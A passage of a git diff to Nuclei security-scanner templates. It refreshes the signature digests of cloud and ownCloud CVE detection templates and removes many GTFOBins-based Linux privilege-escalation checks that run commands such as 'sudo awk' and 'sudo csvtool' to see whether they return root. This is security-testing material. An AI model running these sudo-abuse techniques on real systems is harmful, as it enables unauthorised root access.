- 302
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 4a0a0047304502204e87fb6ea9b294616dce1e74e429d8a83672921a242d1b3421a0c553eba83894022100bf53c3468808e2316f9194022db3618093873de428109de1984d0664f6bc89ee:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022001ff1a4cff9e33f3817df1e824a00e35f76c6f8e22cd34e3616e452978dc46f702200913c7710eba2b3df98325a1bb7da86b55cde6d4a3d7199a7d952f1f7988a3fa:922c64590222798bb761d5b6d8e72950
|
|
@ -39,4 +39,4 @@ http:
|
||||||
- "status_code==302"
|
- "status_code==302"
|
||||||
- contains(location, "login")
|
- contains(location, "login")
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 490a00463044022017250b6b9f7ccf30e614e7bfb992e2e9ec13fd27556137cf4b13dc2f2a8c70b602200e352bbaebbd9dfbced84b3f9dff65c9d1b3dac47a0eec812b738a987931a14c:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402204edc5a3fc90ff80b8397219e37a716d5b582c9821dbb0edda2c52c585aa241ca022067b0c7178f7f345975f765bdd56afc967505028e459ed113c8fbd450a1dcb76a:922c64590222798bb761d5b6d8e72950
|
|
@ -36,4 +36,4 @@ http:
|
||||||
name: "Protected GCP Bucket"
|
name: "Protected GCP Bucket"
|
||||||
status:
|
status:
|
||||||
- 403
|
- 403
|
||||||
# digest: 4b0a00483046022100baff7bb9e12a115a59a755c8188c3544cc8497dc3a17860023486de9f4992def02210096b193c8507208f3d30cd9fc716d4be46cd9acb83418f2fa62f0d10ce305d026:922c64590222798bb761d5b6d8e72950
|
# digest: 490a004630440220549241cfe0dbdadf24bcbdabd6cbf8e82a45bea577710e8409da53f3bdef37d202203bab8b09dea7b68aafc32f8214b331ee6dc4dbe85c0e7a34693b8062dec6fb6a:922c64590222798bb761d5b6d8e72950
|
|
@ -31,4 +31,4 @@ http:
|
||||||
name: "Open GCP Firebase App"
|
name: "Open GCP Firebase App"
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a00473045022065f44c35d042a0e98f90303a7f4181c0644c2e2fb8c7344c42d13104f89a454a022100cf17441e1fdb9ae05d7bdfca68f98abf3a4794b4d24e8ec69083e6323e96c39f:922c64590222798bb761d5b6d8e72950
|
# digest: 490a004630440220721a516d58d71b3c20990c97c22986fd212caafa366f2641bdb4fe9df0a53f9802205ecd4bfcda0808d5002e9d1194e0ec0f4d2b2f2140170c0df4ffb11372a6470f:922c64590222798bb761d5b6d8e72950
|
|
@ -47,4 +47,4 @@ http:
|
||||||
name: "Deactivated GCP Firebase RTDB"
|
name: "Deactivated GCP Firebase RTDB"
|
||||||
status:
|
status:
|
||||||
- 423
|
- 423
|
||||||
# digest: 490a0046304402207b555ae31d639c4a2fa71c2988103f8eb74cd24ca8b3304e33059facb0c9275f02203b74c0ab6645d3c30970046284fffbea86b75f0bcf40192f6021b2297b616b7d:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402200dcb47ae02c77c619eea0d95a6ab7dc9f2be071cea09abee3a7ab748b11e561c022034956ced05346f9cfcc9d425d92fa1242c979572e8ae02030496597f64ccfe82:922c64590222798bb761d5b6d8e72950
|
|
@ -15,11 +15,13 @@ info:
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2023-49105
|
cve-id: CVE-2023-49105
|
||||||
cwe-id: CWE-287
|
cwe-id: CWE-287
|
||||||
cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
|
|
||||||
epss-score: 0.00091
|
epss-score: 0.00091
|
||||||
epss-percentile: 0.38353
|
epss-percentile: 0.38353
|
||||||
|
cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 2
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
vendor: owncloud
|
||||||
product: owncloud
|
product: owncloud
|
||||||
shodan-query: title:"owncloud"
|
shodan-query: title:"owncloud"
|
||||||
tags: cve,cve2023,code,owncloud,auth-bypass
|
tags: cve,cve2023,code,owncloud,auth-bypass
|
||||||
|
@ -84,4 +86,4 @@ http:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- '"Username => "+ username'
|
- '"Username => "+ username'
|
||||||
# digest: 4a0a00473045022100f1395fdef2764cce1bd751a6a94c3f89afc0fb10d9437288388d31d6460a983002203d431b3492fa8d2501b3387ae3cf0f975385c21f7ac74d2deafcf878645c6f45:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100f17bb3bb403b74c4e84e6190df79bf767df834017742b4b95607de42a3d948bb02205f2f1de3f09d31920d6bf102ba93c1ad271809327b5997d8d58e9f97f2886c11:922c64590222798bb761d5b6d8e72950
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-aa-exec
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: aa-exec - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
aa-exec is used to launch a program confined by the specified profile and or namespace.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/aa-exec/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,aa-exec,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
aa-exec whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo aa-exec whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a00463044022052655e82a2302e3930061a3e1ca4ea0c65ab553c1a688654c29f9f50eecb29690220468307131c8570d5c7c58b629e5cb7c069c1078dea98d211b619b0a9de1f6f69:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-ash
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Ash - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Ash allows the value of a variable to be set at the same time it is marked read only by writing readonly name=value With no arguments
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/ash/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,ash,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
ash -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo ash -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100d25c9dd1ce2eab3a962a4071a9f7500f59466848425225cd4047cc3115acbe37022061461b964e2bc7a9985a89d47c03136a8cb815900a1ba2038fbb8d073b88737b:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-awk
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: awk - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
AWK is a domain-specific language designed for text processing and typically used as a data extraction and reporting tool. Like sed and grep, it is a filter, and is a standard feature of most Unix-like operating systems.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/awk/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,awk,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
awk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo awk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502207cfdd41f99f02f347c5b0128ff351ced0e1c8e89e428d60a150c3c0c4f4074a70221008929ee587f0b3ab78860124591c0b22afad37bb9de4f3220dadc7a4fe8865717:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-bash
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Bash - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Bash is a Unix shell and command language written by Brian Fox for the GNU Project as a free software replacement for the Bourne shell. The shell's name is an acronym for Bourne Again Shell, a pun on the name of the Bourne shell that it replaces and the notion of being born again.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/bash/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,bash,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
bash -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo bash -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100b7f18627e0f3bbce9603130789596a844773fb76cdf73efdd2aa6073f8dad7eb02200510ef23d0f787a00e1701e1ad09999cf61f7bfcd43981de1be530439984302d:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-cdist
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Cdist - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
cdist is a free software configuration management tool for Unix-like systems. It manages nodes over SSH using the Bourne Shell, and does not require any additional software to be installed on target nodes.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/cdist/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,cdist,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
cdist shell -s whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo cdist shell -s whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a00483046022100afe727ba45ca0c542cf2d85169a2be57d6e94550933ab38dcea2dc7a3bd9eb32022100e6d9677f8dc6af52f782bf0411ad39256b42baeae17ad41d2cb78f617de9a96c:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-choom
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: choom - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
choom is a command-line utility in Linux that allows users to change the memory limits of a process. It can be used for privilege escalation by manipulating the memory limits of a process to gain elevated privileges.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/choom/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,choom,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
choom -n 0 whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo choom -n 0 whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100fc1a34cafa1e9c85f010f1aa08836c998e0f4e513055f17bfb43da6db708baa202200ec15a67896e438ec1b28022758c36b7989839fa08ede457ff86aa9c0d8c03f8:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-cpulimit
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: CPUlimit - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
cpulimit is a command-line utility in Linux that allows users to limit the CPU usage of a process. It can be used to control and limit the CPU usage of a specific process, which can be helpful in various scenarios such as preventing a process from consuming excessive CPU resources.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/cpulimit/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,cpulimit,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
cpulimit -l 100 -f whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo cpulimit -l 100 -f whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402207e255b9140d3cd0efd52da82f2f4afeb244db042c2f993abb08f8859759f18030220164d73b076aabb9806d19260cc6b408cc718d4417c1cae85d5e6cc7928cb3348:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-csh
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: csh - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
csh stands for C Shell, which is a Unix shell with C-like syntax. It is a command-line interpreter that provides a command-line interface for Unix-like operating systems. It has features similar to other Unix shells such as bash and sh, but with a different syntax and set of features.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/csh/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,csh,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
csh -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo csh -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a00463044022073087d98db072057b1d437680410e93f4001fafa2b317ee2b2222b096888298402205cf5ea8bf97355a4045d3ad9e358df8cdf008972984d331749da3b24cdd81112:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-csvtool
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: csvtool - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
csvtool is a command-line utility in Unix-like operating systems that provides various tools for working with CSV (Comma-Separated Values) files. It can be used to manipulate, process, and analyze CSV data from the command line, making it a useful tool for tasks such as data extraction, transformation, and loading.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/csvtool/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,csvtool,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
csvtool call 'whoami;false' /etc/passwd
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo csvtool call 'whoami;false' /etc/passwd
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a004730450221008f61aeee9c793f162145ff039cb690183408260ff73c1fa21d70cb446f268e0c022019369ba062fbcd462b62d4f372eb206a9f971cc2c9e892cbeaf8db6657748214:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-dash
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Dash - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
dash is a POSIX-compliant shell that is commonly used as the default system shell on Debian-based systems. It is designed to be a lightweight and fast shell, suitable for scripting and system administration tasks. It aims to be compatible with the POSIX standard for shells, providing a minimalistic and efficient environment for running shell scripts.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/dash/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,dash,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
dash -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo dash -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502206693d6df56591ca0de940a5ff0c655c2e36744fd82fb12906d55eaab0705cb5802210099aa3cc19e3d2124e7e010ba08e62fd0fb803c2cbdaa933835208f2c46a4168e:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-dc
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: dc - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
dc is a command-line calculator in Unix and Unix-like operating systems. It uses reverse Polish notation (RPN) and provides a simple and efficient way to perform arithmetic operations from the command line. It can be used for basic and advanced mathematical calculations, making it a handy tool for scripting and quick calculations in the terminal.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/dc/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,dc,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
dc -e '!whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo dc -e '!whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402205ac8f96adceec1df1bfc74a6cee80bb9be8da55b59bd0d39a2962903d92744e602204525b6c022a9b041ab95f3cc04c0d94db22968d66e1977221c13f4923e20cccd:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-distcc
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: distcc - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
distcc is a distributed compilation tool for C, C++, and Objective-C. It allows a user to distribute compilation of these languages across several machines on a network, which can significantly speed up the compilation process for large projects.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/distcc/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,distcc,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
distcc whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo distcc whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402205ba3e54f4b95e19c1661de38e4b1fc44d192293ddfc358839ce83bb50f2f310b02201c16dafa2e5fbab09c2d6cb3fd330dbe9c2f815ed63bb432a4314a1c8d66acaa:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-elvish
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: elvish - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
elvish is a Unix shell that emphasizes expressiveness and extensibility. It aims to provide a more user-friendly and programmable shell experience, with features such as a powerful scripting language, a rich set of data types, and a clean and consistent syntax.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/elvish/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,elvish,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
elvish -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo elvish -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022006ef5df54c4af5c94d5a8116e6729d5f02092d18272e0679ab271be1237406ae022100dede2ce3e800f4da16d6b7495bc2ce6f6b1aaf30870ec0900b1c4f0fcff8e3e2:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-enscript
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: enscript - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
enscript is a command-line tool used for converting text files to PostScript format for printing. It provides various options for formatting and manipulating the output, making it a useful tool for generating high-quality printed documents from text files.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/enscript/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,enscript,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
enscript /dev/null -qo /dev/null -I 'whoami >&2'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo enscript /dev/null -qo /dev/null -I 'whoami >&2'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100cd92c4051987599289f054963d4a8bef07e76dde6a71fc5369dfb8d7bd7d6de502203d17432adfb10310d44a7665cd1039f3ed412c9724b10499074976a8abe39a41:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-env
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: env - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
In Linux, the env command is used to display or modify the environment variables for a command. It can be used to set environment variables for a specific command or to print the current environment variables.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/env/
|
|
||||||
metadata:
|
